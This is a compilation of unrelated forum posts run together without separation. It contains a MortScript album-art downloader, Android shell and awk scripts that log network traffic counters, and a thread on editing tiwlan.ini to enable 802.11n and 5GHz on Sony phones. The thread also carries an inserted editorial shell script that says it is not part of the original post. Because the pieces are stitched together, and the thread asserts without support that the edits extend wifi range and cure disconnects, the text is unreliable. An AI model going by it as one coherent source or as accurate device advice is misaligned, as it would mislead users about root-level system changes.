I have a script which will look for album art from albumart.org and place it in the proper folder. This is great if you use S2P.
The script assumes a couple things:
- your music is in \storage card\music\$artist\$album
- You will need GSFinder
- the folder view dropdown is visible (I scrape the path in the top dropdown to get the artist and album).
- You need to be able to execute the script from within GSFinder. (map script to button, or use a cascading menu that allows you to select the script file)
The script basically sends the artist and album to the website, parses the page, then pulls the image that has a tag that matches the album.
I get about 70% success rate....which is FINE WITH ME!
---------------------------------------------------------
# root of the music library; the folder open in GSFinder must be below it
musicroot = "\Storage Card\Music\"
# read the current path from the folder dropdown at screen position 30,30
d = windowtext(30,30)
message(d)
# strip the library root so that artist\album remains
d = replace(d,musicroot,"")
arrMusic = split(d,"\")
theartist = arrMusic[1]
thealbum = arrMusic[2]
#message (theartist)
#message (thealbum)
# the search result page is saved here before it is parsed
thepath = "\Program Files\MortScripts\"
thefile = "dl1.html"
#connect("Data Network Connect")
connect("The Internet")
Download ("http://albumart.org/index.php?srchkey=" & theartist & "+" & thealbum & "&itempage=1&newsearch=1&searchindex=Music",thepath & thefile)
strParse = ReadFile(thepath&thefile)
# the results start at the element named main_left
mainleft = find(strParse,"main_left")
#message(mainleft)
# first title= attribute after that point belongs to the first hit
arttitle = find(strParse, "title=", mainleft)
#message(arttitle)
if (arttitle>0)
    # the image URL runs from just after src=" up to and including .jpg
    srcstart=find(strParse, "src=", arttitle)
    imagestart = srcstart + 5
    #message("imagestart:" & imagestart)
    imageend = find(strParse, ".jpg", imagestart) + 4
    #message("imageend:" & imageend)
    imagepath=substr(strParse,imagestart,imageend-imagestart)
    message(imagepath)
    # store the cover as folder.jpg inside the album folder
    Download (imagepath,musicroot&theartist & "\" & thealbum & "\folder.jpg")
    message("refresh folder")
endif
--------------------------------------------------
Hope you enjoy it....I LOVE IT!
[script] reliable interface stats
pro: reliable, works on any Linux; low battery consumption; runs only when necessary
contra: no GUI
prerequisites: script manager able to trigger on network changes
root is not needed, because the script uses the readable-for-all /proc/net/dev interface to gather statistics.
My problem was that I could not find any app that would give me the megabytes sent from/to the device. They would either ignore GPRS, WiFi or count from reboot to reboot, display stupid ads or cost even money without delivering. I'm on a data flatrate with throttling from 200MB up, and I only want to know how much I already "spent".
The following script should run on network changes, but it can be run at any time. You get more data entries in the log files for the various active interfaces when running it more often.
EDIT: it turns out the "network change" event works perfectly for interface wlan0, but not for pdp0, which happens to be the GPRS/G2/G3/G4 packet interface. Maybe "Tasker" does better than "Script Manager" with this, try and find out. What will always work is manual mode: after using an interface, run the script. This will enter the numbers from any interface that had traffic into the respective log.
The script is run with zero or one argument. If given, it can be the name of an interface or the string "all" to get just a readout of the current counters of all interfaces that had traffic without logging anything.
The output is lines with bytes, data packets, erroneous and dropped packets for "rx" (received) and "tx" (transmitted) for all or the selected interfaces. Without arguments all active interfaces are logged to separate files in /sdcard/. If you want to change this directory or the names or the date format, well, it should be easy to adapt.
Note that this first script does only data gathering as to the byte counts and it must run on network events. See below for the script(s) that do evaluation according to date to find out how much to go until throttling.
Code:
#!/system/bin/sh
want_if="${1:-*}"
all=""
case "-${want_if}" in
    -all)
        want_if="*"; all=all;
        ;;
esac
log_prefix="/mnt/sdcard/interface-stats"
now="$(date '+%d.%m.%y-%H:%M:%S')"
# rx: bytes packets errs drop fifo frame compressed multicast
# tx: bytes packets errs drop fifo colls carrier compressed
# lo: 4944 74 0 0 0 0 0 0 4944 74 0 0 0 0 0 0
# wlan0: 42447725 41554 302 0 0 0 0 0 3280981 33753 0 0 0 0 0 0
while read intf rb rp re rd x x x x tb tp te td rest
do
    case "-${intf}" in
        -${want_if:-*}:)
            case "${rb}--${tb}" in
                0--0) continue;;
            esac
            stats="rx: $rb $rp $re $rd tx: $tb $tp $te $td"
            intf_="${intf%:}"
            echo "${intf} ${stats}"
            [ -z "${all}" ] &&
                echo "${now} ${stats}" >> "${log_prefix}-${intf_}.txt"
            ;;
    esac
done < /proc/net/dev
exit 0
Here's the script to output the megabytes. It gets zero, one or two arguments, the first being a date pattern that needs to match the dates in the log file, the second the name of said log.
An optional third argument, if given, gives debug output. Use only if the number doesn't look plausible.
It doesn't need any special privileges and can be run anytime.
If less than one megabyte has been hit so far, then the output is the number of bytes. Due to limitations of "awk" there can still be decimals in the output!
Code:
# /home/ino/interface-stats.sh _date: 20120225-2103_
# vim: set filetype=sh ts=4:
# -*- mode: sh; -*-
#
# <url:man:1 awk>
# sample:
#
# 25.02.12-02:28:28 rx: 182909647 374371 462 0 tx: 681742703 542899 0 0
# 25.02.12-12:15:00 rx: 3 374464 494 0 tx: 5 542974 0 0
#
# at around noon the device was rebooted, so the stats start at low
# values.
#
# algorithm:
#
# initialize old-accumulator and offset to zero.
#
# since received and transmitted bytes are accumulated by the kernel,
# the script has to just store the sum of the received and transmitted
# bytes into an accumulator, unless the current value is less than the
# running count. this happens after a reboot. so store this first low
# value into $offset, store the old accumulator and keep the running game
# until either the next reboot or EOF. now
# accumulator = old-accumulator + accumulator - offset.
awk_prog='
BEGIN {
    debug = debug > 0
    accu=0
    accu_old=0
    offset=0
    accu_sum=0
    # megabytes
    mb_scaler=1024*1024
    # field definitions
    rx_bytes=3
    rx_packets=4
    rx_errors=5
    rx_dropped=6
    tx_bytes=8
    tx_packets=9
    tx_errors=10
    tx_dropped=11
    # date pattern
    # 25.02.12-12:15:00 rx: 3 374464 494 0 tx: 5 542974 0 0
    # the dots are written \\. so that the regex receives \. (a literal dot)
    pat_date_dflt = "[0-9][0-9]\\.[0-9][0-9]\\.[0-9][0-9]-[0-9][0-9]:[0-9][0-9]:[0-9][0-9]"
    pat_date = length(pat_date) == 0 ? pat_date_dflt : pat_date
}
function dbg(x) {
    if (debug > 0) print("debug: " x);
}
# no particular validity check: if there are 11 fields and the first one
# matches the date the user is after, we will use the record.
(NF == 11) && ($1 ~ pat_date) {
    dbg("select line: " $0)
    accu_sum = $rx_bytes + $tx_bytes
    if (accu_sum < accu) {
        dbg("break: accu_sum=" accu_sum "; accu_old=" accu_old "; accu=" accu "; offset=" offset);
        accu = accu_old + accu - offset
        accu_old = accu
        offset = accu_sum
        accu = accu_sum
    } else {
        accu = accu_sum
    }
}
END {
    dbg("eof: accu_sum=" accu_sum "; accu_old=" accu_old "; accu=" accu "; offset=" offset);
    accu = accu_old + accu - offset
    if (accu > mb_scaler) accu = (accu / mb_scaler) "MB"
    print(accu)
}
'
debug=0
log_prefix="/mnt/sdcard/interface-stats"
dates="${1:-.}"
want_if="${2:-wlan0}"
debug="${3+1}"
input="${log_prefix}-${want_if}.txt"
awk -v pat_date="${dates}" -v debug="${debug}" "${awk_prog}" "${input}"
And finally this one is for quick inspection of a log. Gets the name of an interface as argument if needed. Again it needs no privileges and is appropriate for use as a SMwidget.
Code:
#!/system/bin/sh
want_if="${1:-wlan0}"
log_prefix="/mnt/sdcard/interface-stats"
logg="${log_prefix}-${want_if}.txt"
[ -r "${logg}" ] &&
    while read tim rx rb rp re rd tx tb tp te td rest
    do
        case "${rb}--${tb}" in
            0--0) continue;;
        esac
        stats="rx: $rb $rp $re $rd tx: $tb $tp $te $td"
        echo "${tim} ${stats}"
    done < "${logg}"
exit 0
Does somebody know what tags to brace code with in order to keep formatting intact? To me all my stuff has no indentation and lines seem to break at other points than just and only newlines!
EDIT: just found out that there's no problem in the web view, it's just the "forum runner" that can't render what the "[ code ]" tag generates.
Well, as an alternative, what's the least-hassle file dump?
Hi
I have discovered how to enable N standard and 5ghz band in ics
1. go to /system/etc/firmware
2. find these files names
PHP:
fm_rx_init_1273.2.bts
fm_tx_init_1273.2.bts
fmc_init_1273.2.bts
If they are there u can apply 5ghz band .. But if they aren't .. U won't get 5ghz band
Now for gb users
4.Go to /system/etc/ and find tiwlan.ini
Note: In CM7 based ROMs the path may be /system/etc/wifi
5.Look for the following lines:
PHP:
HT_Enable=0
BurstModeEnable =0
WifiAdhoc=0
Single_Dual_Band_Solution =0
To
PHP:
HT_Enable=1
BurstModeEnable =1
WifiAdhoc=1
Single_Dual_Band_Solution =1
Reboot your phone and have fun
U can see all that in other threads .. But in ics u can't find 1st 3 of these lines
So i have discovered a way to enable that in ics
Now for ics users
1-Go to /system/etc/ and find tiwlan.ini
Note: In CM7 based ROMs the path may be /system/etc/wifi
2-open tiwlan.ini with text editor
Select all words and delete
after that paste these lines .. It is from gb and it works on ics
PHP:
# Note: The letters in this file are NOT case sensitive.
IniVersion = 0 # compatibility version between the ini file and the wlan driver
SmeConnectMode = 1 #0 - auto, 1 - manual
ScanResultAging = 0 # in Second - range 0..1000
WME_Enable = 1 #0=diable WME support / 1=Enable
dot11NetworkType = 3 #2 - A only mode, 3 - B/G mode, 4 - A/G Dual mode
SmeScanGChannelList = 1,2,3,4,5,6,7,8,9,10,11,12,13,14
SmeScanAChannelList = 36,40,44,48,52,56,60,64
RecoveryEnable = 1 #0 -Disabled 1- Enabled
BThWlanCoexistEnable = 1 #0 - SG disable, 1 - SG protective
TxCompleteThreshold = 3
RxAggregationPktsLimit = 8
RxInterruptThreshold = 3 #0 - Rx Pacing disable
QOS_txBlksThresholdVO = 2 # Reserved Blks for voice
#
# Power Manager
#
BeaconListenInterval = 1 # the number of N-Beacon or N-DTim
DtimListenInterval = 1 #
dot11PowerMode = 0 #0 - Auto
#1 - Active
#2 - Short Doze
#3 - Long Doze
AutoPowerModeDozeMode = 3 #2 - Short Doze
#3 - Long Doze
AutoPowerModeActiveTh = 0 #packets per second
AutoPowerModeDozeTh = 0 #packets per seconds - threshold for entering ELP in Auto mode
AutoPowerModeInterval = 100
defaultPowerLevel = 0 #0 - ELP
#1 - PD
#2 - AWAKE
PowerSavePowerLevel = 0 #0 - ELP
#1 - PD
#2 - AWAKE
TxPower = 205 #set Default Tx Power Level in DBM * 10
dot11FragmentationThreshold = 4096
dot11RTSThreshold = 4096
WPAMixedMode= 1
RSNPreAuthentication = 1
CalibrationChannel24 = 1
CalibrationChannel5 = 36
# Regulatury Domain tables.
# Each byte correlates to one channel in sequential order. Table 2.4 starts from channel 1, Table 5.0 starts from channel 36.
# Bits 0..4 - Max power allowed in Dbm.
# Bit 6 - Channel is allowed for Active scan
# BIt 7 - Channel is allowed
AllowedChannelsTable24 = FFFFFFFFFFFFFFFFFFFFFFFFFFFF
AllowedChannelsTable5 = FF000000FF000000FF000000FF000000FF000000FF000000FF000000FF0000000000000000000000000000000000000000000000000000000000000000000000FF000000FF000000FF000000FF000000FF000000FF000000FF000000FF000000FF000000FF000000FF0000000000000000FF000000FF000000FF000000FF000000FF000000000000000000000000000000
SpectrumManagement = 0 # 0 - Disable 802.11h, 1 - Enable
RxBroadcastInPs = 1
#arp ip filter - must be written 8 characters for example 10.2.43.3 -> 0a 02 2b 21 and not a 2 2b 21
ArpIp_Addr = 0a 02 0a b7
ArpIp_Filter_ena = 0
#mac filter
Mac_Filter_Enabled = 0
numGroupAddrs = 4
Group_addr0 = 10 01 02 03 04 05
Group_addr1 = 11 11 12 13 14 15
Group_addr2 = 12 21 22 23 24 25
Group_addr3 = 13 31 32 33 34 35
Group_addr4 = 14 41 42 43 44 45
Group_addr5 = 15 51 52 53 54 55
Group_addr6 = 16 61 62 63 64 65
Group_addr7 = 17 71 72 73 74 75
#beacon filter
Beacon_Filter_Desired_State = 1
Beacon_Filter_Stored = 1
#beacon IE table
#the size is the len of the string - spaces = number of bytes
Beacon_IE_Num_Of_Elem = 16
Beacon_IE_Table_Size = 37
Beacon_IE_Table = 00 01 01 01 32 01 2a 01 03 01 06 01 07 01 20 01 25 01 23 01 30 01 28 01 2e 01 3d 01 85 01 dd 01 00 52 f2 02 00 01
# rate policy - short / long retries
RatePolicyUserShortRetryLimit = 10
RatePolicyUserLongRetryLimit = 10
#rate policies
#rates guide: -->>mcs7,msc6,mcs5,mcs4,mcs3,mcs2,mcs1,mcs0,54,58,36,24,22,18,12,11,9,6,5.5,2,1
OsDbgState = 0x01e9003c # -1 or 0xffffffff -all (opens debug messages in o.s. only - sevirity+modules)
#############################################################
# Configure the severity table (0 = Disable/ 1 = Enable)
#
# Byte #0: Init
# Byte #1: Information
# Byte #2: Warning
# Byte #3: Error
# Byte #4: Fatal Error
# Byte #5: SM
# Byte #6: Console
#############################################################
ReportSeverityTable = 00001101
BeaconReceiveTime = 50
#
# QOS UPSD
#
desiredPsMode = 1 # Global Power save delivery protocol (1 - UPSD, 0 - Legacy)
QOS_wmePsModeBE = 0 # Power save delivery protocol for BE AC (1 - UPSD, 0 - Legacy)
QOS_wmePsModeBK = 0 # Power save delivery protocol for BK AC (1 - UPSD, 0 - Legacy)
QOS_wmePsModeVI = 0 # Power save delivery protocol for VI AC (1 - UPSD, 0 - Legacy)
QOS_wmePsModeVO = 1 # Power save delivery protocol for VO AC (1 - UPSD, 0 - Legacy)
#
# QOS Classifier
#
Clsfr_Type = 1 # 1 - DSCP, 2 - Port, 3 - IP+port
NumOfCodePoints = 4
DSCPClassifier00_CodePoint = 0 #Best Effort
DSCPClassifier00_DTag = 0
DSCPClassifier01_CodePoint = 8 #Background
DSCPClassifier01_DTag = 1
DSCPClassifier02_CodePoint = 40 #Video
DSCPClassifier02_DTag = 5
DSCPClassifier03_CodePoint = 56 #Voice
DSCPClassifier03_DTag = 6
dot11MaxReceiveLifetime=512000
WiFiAdhoc = 1
dot11BeaconPeriod = 100
ConnSelfTimeout = 60000
RRMEnabled = 0
WiFiWmmPS = 0 # Use 1 on WiFi test in order to configure PS to work in WMM mode
TriggeredScanTimeOut = 50000 # Maximum time in Us between 2 channels on triggered scan
# PsPoll delivery failure solution
PsPollDeliveryFailureRecoveryPeriod = 20 # Time in Ms to stay ACTIVE ('0' to disable feature)
ConsecutivePsPollDeliveryFailureThreshold = 4 # Number of failed PsPoll's to start ACTIVE time out
#Auto Rx streaming
PsTrafficPeriod = 20
# Weights in percent for RSSI/SNR Average calculations
RssiBeaconAverageWeight = 20
RssiPacketAverageWeight = 10
SnrBeaconAverageWeight = 20
SnrPacketAverageWeight = 10
HT_Enable=1 # 0 = diable 802.11n support / 1=Enable
IbssProtectionType = 1 # 0 = CTS protaction disable ; 1 = Standard CTS protaction
BurstModeEnable = 1 # 0 - Disabled 1 - Enabled
RoamScanEnable = 1 # 1- roaming and immidate scan enable by deafult 0- allowing roaming ' scannig due to CLI confguration
RoamingOperationalMode = 1 # 0=Manual , 1=Auto
coexDhcpTime = 4000
BaPolicyTid_0 = 3
#============================ Radio parameters - Start ========================
#------- General parameters ------
TXBiPFEMAutoDetect = 0 # Length: 1; Unit: Options (0: Manual Mode, 1: Automatic mode); Format: Unsigned; Source: Customer; Comment: This parameter is used by the FW to decide if the front-end is determined automatically or manually
TXBiPFEMManufacturer = 1 # Length: 1; Unit: Options (0: FEM0, 1: FEM1); Format: Unsigned; Source: Customer; Comment: (bit0) This parameter is used to determine which FEM vendor type is used on the platform
STRFRefClock = 1 # Length: 1; Unit: Bit_Options; Format: Unsigned; Source: Customer; Comment: 5'bXX000 : Bit 0,1,2 - 0: 19.2MHz, 1: 26MHz, 2: 38.4MHz [Default], 3: 52MHz, 4: 38.4MHz XTAL, 5: 26MHz XTAL , 5'bX0XXX : Bit 3 - CLK_REQ type, 0 = wired-OR [Default], 1= push-pull , 5'b0XXXX : Bit 4 - CLK_REQ polarity, 0 = Normal [Default], 1=Inverted
STRFRefClockSettingTime = 5 # Length: 1; Unit: ms (0-15); Format: Unsigned; Source: Customer; Comment: The time from asserting CLK_REQ (low to high) to valid FREF clock on the device inputs
ClockValidOnWakeup = 0 # Length: 1; Unit: Options (0: Reference clock not valid, 1: Reference clock is valid and stable); Format: Unsigned; Source: Customer; Comment: This parameter indicates whether the FREF clock is valid on wakeup
TCXO_Clk = 1 # Length: 1; Unit: Bit_Options; Format: Unsigned; Source: Customer; Comment: 5'bXX000 : Bit 0,1,2 - 0: 19.2MHz, 1: 26MHz, 2: 38.4MHz [Default], 3: 52MHz, 4: 16.368Mhz, 5: 32.736 Mhz
TCXO_SettlingTime = 5 # Length: 1; Unit: ms (0-15); Format: Unsigned; Source: Customer; Comment: The time from asserting CLK_REQ (low to high) to valid TCXO clock on the device inputs
TCXO_ClockValidOnWakeup = 0 # Length: 1; Unit: Options (0: Reference clock not valid, 1: Reference clock is valid and stable); Format: Unsigned; Source: Customer; Comment: This parameter indicates whether the TCXO clock is valid on wakeup
TCXO_LDO_Voltage = 0 # Length: 1; Unit: Options (0:2.5v, 1:2.55v, 2:2.6v); Format: Unsigned; Source: Customer; Comment: TCXO LDO Voltage
Platform_configuration = 2 # Length: 1; Unit: Bit_Options; Format: Unsigned; Source: Customer ; Comment: Bit 0: Levelshifter support (0: No LS, 1: With LS), Bit 1,2:Configure IO's [SDIO/wspi] (00- 8mA, 01- 4mA (default), 10- 6mA, 11 - 2mA), Bit 3:Eeprom (0-No Eeprom), Bit 4: SDIO IB Enable sync, Bit 5: SDIO IB Enable async, Bit 6: SDIO IB Enable BlockMode, Bit 7: SDIO High-Speed support
Single_Dual_Band_Solution = 1 # Length: 1; Unit: Options (0: 2.5v, 1: 2.55v, 2: 2.6v); Format: Unsigned; Source: Customer; Comment: This field notifies the FW whether the solution is a single-band or dual-band
Settings = 00,00,00,00 # Length: 4; Unit: Bit_Options; Format: Unsigned; Source: Customer; Comment: Bit0: NBI (0: Off, 1: On), Bit1: Telec channel 14 (0: Off, 1: On), Bit2: FEM0-LB, Bit3: FEM0-HB, Bit4: FEM1-LB, Bit5: FEM1-HB - TX BiP load (0: Internal, 1: External), Bit6: LPD Low band, Bit7: LPD High band
XTALItrimVal = 4 # Length: 1; Unit: Current trimming for XTAL; Format: Unsigned; Source: TI; Comment: Current trimming for XTAL
SRState = 0 # Length: 1; Unit: Options (0: Disabled, 1: Enabled); Format: Decimal; Source: TI; Comment: Smart Reflax (proprietary mechanism of TI that identify the silicon process specific params) state
SRF1 = 09,04,19,10,08,00,f7,ef,e6,de,00,00,00,00,0f,3f # Length: 16; Unit: SRF1 values; Format: Signed; Source: TI; Comment: The table holds the specific parameters for using the SmartReflex mechanism
SRF2 = 09,04,19,10,08,00,f7,ef,e6,de,00,00,00,00,00,00 # Length: 16; Unit: SRF2 values; Format: Signed; Source: TI; Comment: The table holds the specific parameters for using the SmartReflex mechanism
SRF3 = 09,04,19,10,08,00,f7,ef,e6,de,00,00,00,00,00,00 # Length: 16; Unit: SRF3 values; Format: Signed; Source: TI; Comment: The table holds the specific parameters for using the SmartReflex mechanism
#SR_Debug_Table = 09 04 19 10 01 00 F7 EF E6 DE 00 00 00 00 00 00 # Length: 16; Unit: SR_Debug_Table values; Format: Signed; Source: TI; Comment: SR Debug values - for TI internal use only
#SR_SEN_N_P = 11 # Length: 1; Unit: SR_SEN_N_P values; Format: Unsigned; Source: TI; Comment: SR Debug values - for TI internal use only
#SR_SEN_N_P_Gain = AA # Length: 1; Unit: SR_SEN_N_P_GAIN values; Format: Unsigned; Source: TI; Comment: SR Debug values - for TI internal use only
#SR_SEN_NRN = B6 # Length: 1; Unit: SR_SEN_NRN values; Format: Unsigned; Source: TI ; Comment: SR Debug values - for TI internal use only
#SR_SEN_PRN = F0 # Length: 1; Unit: SR_SEN_PRN values; Format: Unsigned; Source: TI ; Comment: SR Debug values - for TI internal use only
RxTraceInsertionLoss_2_4G = 0 # Length: 1; Unit: 1/8dB; Format: Unsigned; Source: Customer; Comment: This parameter indicates the printed circuit board (PCB) trace insertion loss
TxTraceLoss_2_4G = 00,00,00,00,00,00,00,00,00,00,00,00,00,00 # Length: 14; Unit: 1/8dB; Format: Unsigned; Source: Customer; Comment: This parameter is used to align the output power to a different location on the board
#------------------------------------------------------
#------- Radio parameters for TQS_S_2.6 -------
FemVendorAndOptions = 1 # Length: 1; Unit: Bit_Options; Format: Unsigned; Source: Customer; Comment: Bit 0..1 - 0: RFMD, 1: TQS, 2: SKWS, Bit 4..7 [Version control] - 0: TQS-S1.0, 1: TQS-S2.0, 2: TQS-S2.5, 3: TQS-D1.0, 4: TQS-D1.5, 5: RFMD-S1.5, 6: RFMD-S2.9, 7: RFMD-S3.0, 8: RFMD-D1.5, 9: RFMD-S2.9.5, 10: RFMD-D3.0.1, 11: TQS-S2.6, 12: TQS-D1.7
TxBiPReferencePDvoltage_2_4G = 375 # Length: 1; Unit: 1mV; Format: Unsigned; Source: TI; Comment: This parameter define the reference point of the FEM power detector
TxBiPReferencePower_2_4G = 128 # Length: 1; Unit: 1/8dB; Format: Signed; Source: TI; Comment: Reference output power that produces given reference power detector output voltage . The TX BiP reference power is linked to the TX BiP reference PD voltage
TxBiPOffsetdB_2_4G = 0 # Length: 1; Unit: 1/8dB; Format: Signed; Source: Customer; Comment: This field is used to fine-tune the TX BiP by the customer
TxPerRatePowerLimits_2_4G_Normal = 1d,1f,22,26,27,29,25 # Length: 7; Unit: 1/2dB; Format: Signed; Source: Customer; Comment: The limits are applied to the power control process according to the VBAT and temperature range in which the FEM is operating
TxPerRatePowerLimits_2_4G_Degraded = 1a,1f,22,25,25,27,23 # Length: 7; Unit: 1/2dB; Format: Signed; Source: Customer; Comment: The limits are applied to the power control process according to the VBAT and temperature range in which the FEM is operating
TxPerRatePowerLimits_2_4G_Extreme = 16,1d,1e,20,24,25,22 # Length: 7; Unit: 1/2dB; Format: Signed; Source: Customer; Comment: The limits are applied to the power control process according to the VBAT and temperature range in which the FEM is operating
DegradedLowToNormalThr_2_4G = 30 # Length: 1; Unit: 1/10 volts; Format: Unsigned; Source: TI; Comment: The limits are applied to the power control process according to the VBAT and temperature range in which the FEM is operating
NormalToDegradedHighThr_2_4G = 45 # Length: 1; Unit: 1/10 volts; Format: Unsigned; Source: TI; Comment: The limits are applied to the power control process according to the VBAT and temperature range in which the FEM is operating
TxPerChannelPowerLimits_2_4G_11b = 50,50,50,50,50,50,50,50,50,50,50,50,50,50 # Length: 14; Unit: 1/2dB; Format: Signed; Source: Customer; Comment: The purpose of this table is to allow clipping of the maximum output power on certain channels
TxPerChannelPowerLimits_2_4G_OFDM = 50,50,50,50,50,50,50,50,50,50,50,50,50,50 # Length: 14; Unit: 1/2dB; Format: Signed; Source: Customer; Comment: The purpose of this table is to allow clipping of the maximum output power on certain channels
TxPDVsRateOffsets_2_4G = 01,02,02,02,02,00,02 # Length: 7; Unit: 1/8dB; Format: Signed; Source: TI; Comment: This parameter is a power detector offset value used to correct the power detector curve for each rate group
TxPDVsChannelOffsets_2_4G = 00,00,00,00,00,00,00,00,00,00,00,00,00,00 # Length: 14; Unit: 1/8dB; Format: Signed; Source: TI/Customer; Comment: This parameter is a power detector offset value used to correct the power detector curve for each channel
TxPDVsTemperature_2_4G = 00,00 # Length: 2; Unit: 1/8dB; Format: Signed; Source: TI; Comment: This parameter is a power detector offset value used to correct the power detector curve for each temperture
TxIbiasTable_2_4G = 17,17,17,13,17,17,17,17 # Length: 8; Unit: Codeword ; Format: Unsigned; Source: TI; Comment: This parameter sets the bias current provided by the SoC to the PA in the FEM. Options (MCS7, 54/48, 36/24, 18/12, 9/6, 11b, MCS0, 11bCh14)
RxFemInsertionLoss_2_4G = 14 # Length: 1; Unit: 1/8dB; Format: Unsigned; Source: TI; Comment: This parameter specifies the received insertion loss of the WL128x
#=========================== Radio parameters - End ==========================
#===========================Coexistence Parameters -Start =========================#
# PASSIVE_SCAN_BT_EDR_BT_TIME_MSEC
coexTempParam4 = 30
# PASSIVE_SCAN_BT_EDR_WLAN_TIME_MSEC
coexTempParam5 = 14
#Passive Scan Compensation time for EDR
coexBtPerThreshold = 300
#===========================Coexistence Parameters -End =========================#
If any one wants my tiwlan here
http://www.mediafire.com/?p6553158cnr47wa
U can copy words from it and replace with yours
Have fun
For all ics users that tried this and it worked please reply ..
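An added example, not part of the original post and not the poster's own script: instead of deleting the whole of tiwlan.ini and pasting in another file, the script below rewrites only the named keys, keeps each line's trailing comment, and leaves the file untouched when a key is absent (the ICS case described above). The function names set_ini_keys, make_sample and demo are hypothetical, the sample lines are constructed in the style of the file quoted above, and a POSIX sh with awk, cp, diff and mktemp (for example busybox) is assumed.

```shell
#!/bin/sh
# Added example (not from the thread): change individual tiwlan.ini keys in place.
# Key names are compared case-insensitively because the file header says
# "The letters in this file are NOT case sensitive."

# set_ini_keys FILE KEY=VALUE [KEY=VALUE ...]   (values must not contain spaces)
#   0  every key was found and rewritten; FILE.bak holds the previous content
#   1  FILE is unreadable or the backup could not be written
#   3  at least one key is absent; FILE is left untouched
set_ini_keys() {
    ini="$1"; shift
    [ -r "$ini" ] || { echo "cannot read $ini" >&2; return 1; }
    tmp="$ini.new.$$"
    awk -v pairs="$*" '
    BEGIN {
        n = split(pairs, p, " ")
        for (i = 1; i <= n; i++) {
            eq = index(p[i], "=")
            want[tolower(substr(p[i], 1, eq - 1))] = substr(p[i], eq + 1)
        }
    }
    # comment lines and lines without "=" pass through unchanged
    /^[ \t]*#/ || index($0, "=") == 0 { print; next }
    {
        eq  = index($0, "=")
        key = substr($0, 1, eq - 1)
        gsub(/[ \t]/, "", key)
        lk = tolower(key)
        if (!(lk in want)) { print; next }
        # keep the explanatory "# ..." text that follows the old value
        rest = substr($0, eq + 1)
        hash = index(rest, "#")
        note = hash ? " " substr(rest, hash) : ""
        print key " = " want[lk] note
        seen[lk] = 1
    }
    END {
        for (k in want) if (!(k in seen)) {
            print "key not present: " k > "/dev/stderr"
            missing++
        }
        exit (missing ? 3 : 0)
    }' "$ini" > "$tmp"
    rc=$?
    if [ "$rc" -ne 0 ]; then rm -f "$tmp"; return "$rc"; fi
    cp -p "$ini" "$ini.bak" || { rm -f "$tmp"; return 1; }
    # overwrite the content rather than replace the file, so that the owner
    # and mode of the original file stay as they were
    cat "$tmp" > "$ini" && rm -f "$tmp"
}

# Constructed sample: a few lines in the style of the tiwlan.ini quoted above.
make_sample() {
    cat > "$1" <<'EOF'
# Note: The letters in this file are NOT case sensitive.
WiFiAdhoc = 0
HT_Enable=0 # 0 = diable 802.11n support / 1=Enable
BurstModeEnable = 0 # 0 - Disabled 1 - Enabled
Single_Dual_Band_Solution = 0 # single-band or dual-band
EOF
}

# Apply the four changes from the post to the sample and show what changed.
demo() {
    d=$(mktemp -d) || return 1
    make_sample "$d/tiwlan.ini"
    set_ini_keys "$d/tiwlan.ini" HT_Enable=1 BurstModeEnable=1 \
        WifiAdhoc=1 Single_Dual_Band_Solution=1
    status=$?
    diff "$d/tiwlan.ini.bak" "$d/tiwlan.ini"
    rm -rf "$d"
    return "$status"
}
demo
```

On the device the call would be set_ini_keys /system/etc/tiwlan.ini HT_Enable=1 BurstModeEnable=1 WifiAdhoc=1 Single_Dual_Band_Solution=1, run with /system mounted writable; tiwlan.ini.bak then holds the previous content for a rollback.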
care to share your source plz?
iONEx said:
care to share your source plz?
I agree with iONEx...too 'dangerous' to delete the file and write it ALL back... can you share the file? Please xD
UchihaDareNial said:
I agree with iONEx...too 'dangerous' to delete the file and write it ALL back... can you share the file? Please xD
u have to delete its lines and replace these .. I did that .. U can backup ur tiwlan.ini before ..
Anyway i edit it in the original post
Guys,
My st15i have the N wifi problem (AP not in range even in house) since GB 2.3.4 fw .42, upgrade to fw .62 still got the same problem, now i upgrade to fw .431 ICS, still have the problem, i already paste tiwlan.ini from this thread and st15i detect my AP, but when i off wifi and on, again my AP router not in range. Info: my AP is TPlink TP-W8961ND. Need help, thanks
what does this do actually?
I tried it and I don't know how to test whether it works or not?
XDA Premium sent this message from owner of Sk17i
akulan3 said:
Guys,
My st15i have the N wifi problem (AP not in range even in house) since GB 2.3.4 fw .42, upgrade to fw .62 still got the same problem, now i upgrade to fw .431 ICS, still have the problem, i already paste tiwlan.ini from this thread and st15i detect my AP, but when i off wifi and on, again my AP router not in range. Info: my AP is TPlink TP-W8961ND. Need help, thanks
I am happy to hear that it worked with u
I have this problem too .. Try changing router channel to 11 and try to not disconnect a lot
Izzy Stinson said:
what does this do actually?
It increases ur android wifi range
shinishi said:
It increases ur android wifi rage
cool. does it work on stock gingerbread?
my wifi always gets disconnected by itself whenever im downloading big files and most of the time, while im browsing the android market and appbrain market.
and sometimes after my wifi disconnected, it doesnt reconnect by itself i need to switch off my phone wifi then switch it on back.
can this fix that?
or maybe its my router problem?
UchihaDareNial said:
I tried it and I don't know how to test whether it works or not?
XDA Premium sent this message from owner of Sk17i
It will increase ur android wifi range .. U can use ur wifi at more distance for me router rage is smaller than my home distance so i need some thing like this to use internet at every corner
Izzy Stinson said:
cool. does it work on stock gingerbread?
my wifi always gets disconnected by itself whenever im downloading big files and most of the time, while im browsing the android market and appbrain market.
and sometimes after my wifi disconnected, it doesnt reconnect by itself i need to switch off my phone wifi then switch it on back.
can this fix that?
or maybe its my router problem?
The problem is only the distance .
When u r downloading u r not near the router sure ?
So ur phone connection will be weak and may disconnect any time if u put ur phone in ur hand .
When u do this the rage will be larger and ur problem will be solved
Read the original post .. I have written how to do that for gingerbread(gb)try it and tell me the result
shinishi said:
The problem is only the distance .
When u r downloading u r not near the router sure ?
So ur phone connection will be weak and may disconnect any time if u put ur phone in ur hand .
When u do this the rage will be larger and ur problem will be solved
Read the original post .. I have written how to do that for gingerbread(gb)try it and tell me the result
when im in my room, my wifi signal is weak 1 bar. and of course near the where my router located my wifi signal is full bar.
i have done an experiment, both full and weak wifi signals, my wifi still gets disconnected when downloading big files, browsing market etc.
im not sure if its router or my phone wifi problems.
i will test it soon if i have time. but i doubt it will fix my problems though. because i have tried your method it is similar as from this thread
http://forum.xda-developers.com/showthread.php?t=1568792
" 9. Enabling WiFi Dual Band and Burst Mode
As the title already, this is to increase the internet speed for WiFi on your phone.
Personally, I didn't notice any difference in battery usage.
Open Root Explorer, go to \system\etc and open file named tiwlan.ini with Text Editor.
Edit these lines:
Code:
HT_Enable=0
BurstModeEnable = 0
WiFiAdhoc = 0
to
Code:
HT_Enable=1
BurstModeEnable = 1
